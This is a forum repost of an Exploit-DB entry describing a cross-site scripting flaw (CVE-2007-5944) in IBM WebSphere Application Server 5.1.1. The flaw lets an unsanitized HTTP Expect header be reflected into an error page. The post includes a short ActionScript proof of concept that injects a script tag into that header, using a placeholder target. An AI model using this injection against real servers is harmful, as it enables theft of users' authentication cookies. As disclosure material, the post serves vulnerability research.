Exploit IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30768
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2007-5944
Дата публикации
2007-11-15
Код:
source: https://www.securityfocus.com/bid/26457/info

IBM WebSphere Application Server is prone to a security weakness regarding an HTTP request header. The software fails to sanitize a certain HTTP header when the data is redirected to an error message.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks. 

var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");
 
Источник
www.exploit-db.com

Похожие темы